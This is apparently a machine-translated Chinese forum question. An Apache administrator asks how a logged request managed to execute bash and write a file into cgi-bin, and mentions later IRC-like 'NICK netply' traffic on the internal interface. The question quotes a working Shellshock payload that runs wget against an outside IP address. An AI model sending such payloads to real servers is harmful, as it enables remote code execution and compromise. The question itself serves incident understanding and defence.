2014-09-29 67 views
0

我在Apache 2.2.22上运行了几个虚拟主机,并且只注意到日志中一个相当惊人的事件:来自冰岛的“安全扫描器”能够通过以下http请求行将文件写入cgi-bin目录:如何防止Apache执行请求行作为bash命令?

() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\" 

它有效地下载了有问题的文件。
任何人都可以解释这个请求如何设法实际执行bash命令吗?

当然,cgi-bin不应该是可写的,但它仍然有助于理解这种类型的漏洞利用函数以及是否无法更改Apache配置参数以便请求命令永远不会执行...

这可能是无关的,但几个小时后,有已经开始从内部接口奇怪的请求流,每2秒发生:

host: ":443" request: "NICK netply" source ip: 127.0.0.1 

回答